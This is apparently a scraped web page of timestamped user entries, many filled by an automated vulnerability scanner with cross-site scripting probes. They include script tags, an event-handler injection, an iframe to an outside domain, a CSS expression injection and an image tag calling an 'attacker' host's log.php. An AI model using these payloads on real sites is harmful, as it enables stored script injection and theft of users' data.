  2021-05-06 06:38:41


  1


 • pHqghUme

  2021-05-06 06:34:04


  1


 • pHqghUme

  2021-05-06 06:33:46


  1


 • pHqghUme

  2021-05-06 06:29:52


  1


 • pHqghUme

  2021-05-06 06:29:37


  1


 • 1B6SaVfBDVO

  2021-05-06 06:29:26


  1


 • pHqghUme

  2021-05-06 06:29:26


  1fGNSlqx4O


 • pHqghUme

  2021-05-06 06:29:25


  1


 • pHqghUme

  2021-05-06 06:29:24


  1


 • pHqghUme

  2021-05-06 06:29:16


  1


 • pHqghUme

  2021-05-06 05:49:30


  1<XC8BFI<


 • pHqghUme<8qSyGi<

  2021-05-06 05:49:22


  1


 • pHqghUme

  2021-05-06 05:49:19


  1<img sRc='http://attacker-9761/log.php?


 • pHqghUme<img sRc='http://attacker-9164/log.php?

  2021-05-06 05:49:12


  1


 • pHqghUme

  2021-05-06 05:49:11


  1<T32qCH x=9571>


 • pHqghUme<rzx01q x=9056>

  2021-05-06 05:49:01


  1


 • pHqghUme

  2021-05-06 05:48:52


  1<ifRAme sRc=9503.com></IfRamE>


 • pHqghUme<ifRAme sRc=9988.com></IfRamE>

  2021-05-06 05:48:42


  1


 • pHqghUme

  2021-05-06 05:48:40


  1<WKN2EB>C4BZ9[!+!]</WKN2EB>


 • pHqghUme

  2021-05-06 05:48:19


  1roNlm <ScRiPt >VZB7(9201)</ScRiPt>


 • pHqghUme<WYFETY>D1OD3[!+!]</WYFETY>

  2021-05-06 05:48:17


  1


 • pHqghUme

  2021-05-06 05:48:08


  1<% contenteditable onresize=VZB7(9493)>


 • pHqghUmeaHyYf <ScRiPt >tRw9(9455)</ScRiPt>

  2021-05-06 05:48:07


  1


 • pHqghUme<% contenteditable onresize=tRw9(9194)>

  2021-05-06 05:47:57


  1


 • pHqghUme

  2021-05-06 05:47:55


  1}body{acu:Expre/**/SSion(VZB7(9402))}